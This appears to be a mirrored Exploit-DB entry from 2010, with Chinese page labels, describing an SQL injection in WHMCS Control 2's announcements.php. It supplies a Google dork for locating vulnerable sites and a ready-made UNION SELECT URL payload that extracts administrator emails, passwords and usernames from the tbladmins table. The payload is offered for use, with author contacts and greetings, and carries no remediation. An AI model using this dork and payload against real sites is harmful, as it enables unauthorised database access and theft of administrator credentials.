WHMCompleteSolution (WHMCS) Control 2 – ‘announcements.php’ SQL Injection

• Exploit Database
• 14 阅读

• 作者： Islam DefenDers
  日期： 2010-05-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12481/

• Software: WHMCS control 2Sql Injection 
   
  Vulnerability: Remote Sql Injection
  Google Dork: Powered by WHMCompleteSolution - or "inurl:WHMCS or' announcements.php 
  Off. site: www.MiXaTy.com 
  
  
  Author
  Author: Islam DefenDers
  Date: 2.5.2010 
  Contact:email: hackereg@hotmail.com 
  
  
  Sql Injection
  Exploit: http://site/announcements.php?id=1' and 1=0 union all select 1,2,concat(email,0x3d,password),username,5 from tbladmins--
  DOWNLOAD : http://www.whmcs.com/
  Greetz
  IsLam DefenDers Mr.HaMaDa 
  
  
  HaMaDa SCoOoRPioN 
  
  site: www.mixaty.com
  
  E: hackereg@hotmail.com